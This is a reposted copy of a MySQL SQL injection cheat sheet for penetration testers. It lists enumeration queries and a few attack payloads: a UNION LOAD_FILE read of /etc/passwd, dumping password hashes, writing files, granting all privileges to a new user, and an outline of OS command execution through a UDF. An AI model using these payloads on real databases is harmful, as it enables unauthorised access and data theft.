MySQL SQL Injection Cheat Sheet

MySQL SQL Injection Cheat Sheet
Version	SELECT @@version
Comments	SELECT 1;#comment SELECT /*comment*/1;
Current User	SELECT user(); SELECT system_user();
List Users	SELECT user FROM mysql.user; — priv
List Password Hashes	SELECT host,user, password FROM mysql.user; — priv
Password Cracker	Johnthe Ripper will crack MySQL password hashes.
List Privileges	SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs
	SELECT host,user, Select_priv, Insert_priv, Update_priv, Delete_priv,Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; —priv, list user privs
	SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases(schemas)
	SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts	SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
	SELECT host,user FROM mysql.user WHERE Super_priv = 'Y'; # priv
Current Database	SELECT database()
List Databases	SELECT schema_name FROM information_schema.schemata; — for MySQL >=v5.0
	SELECT distinct(db) FROM mysql.db — priv
List Columns	SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' ANDtable_schema != 'information_schema'
List Tables	SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name	SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; — find table which have a columncalled 'username'
Select NthRow	SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rowsnumbered from 0
	SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rowsnumbered from 0
Select NthChar	SELECT substr('abcd', 3, 1); # returns c
Bitwise AND	SELECT 6 &2; # returns 2
	SELECT 6 &1; # returns 0
ASCII Value-> Char	SELECT char(65); # returns A
Char ->ASCII Value	SELECT ascii('A'); # returns 65
Casting	SELECT cast('1′ AS unsigned integer);
	SELECT cast('123′ AS char);
StringConcatenation	SELECT CONCAT('A','B'); #returns AB
	SELECT CONCAT('A','B','C'); # returns ABC
If Statement	SELECT if(1=1,'foo','bar'); — returns 'foo'
Case Statement	SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
Avoiding Quotes	SELECT 0×414243; # returns ABC
Time Delay	SELECT BENCHMARK(1000000,MD5('A'));
	SELECT SLEEP(5); # >= 5.0.12
Make DNSRequests	Impossible?
CommandExecution	If mysqld(<5.0) is running as root AND you compromise a DBA account youcan execute OS commands by uploading a shared object file into/usr/lib (or similar). The .so file should contain a User DefinedFunction (UDF). raptor_udf.cexplains exactly how you go about this. Remember to compile forthe target architecture which may or may not be the same as yourattack platform.
Local File Access	…' UNION ALL SELECT LOAD_FILE('/etc/passwd') — priv, can only readworld-readable files.
	SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; — priv, write to filesystem
Hostname,IP Address	SELECT @@hostname;
Create Users	CREATE USER test1 IDENTIFIED BY 'pass1′; — priv
Delete Users	DROP USER test1; — priv
Make User DBA	GRANT ALL PRIVILEGES ON *.* TO test1@'%'; — priv
Location of DB files	SELECT @@datadir;
Default/SystemDatabases	information_schema(>= mysql 5.0) mysql

原始链接:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet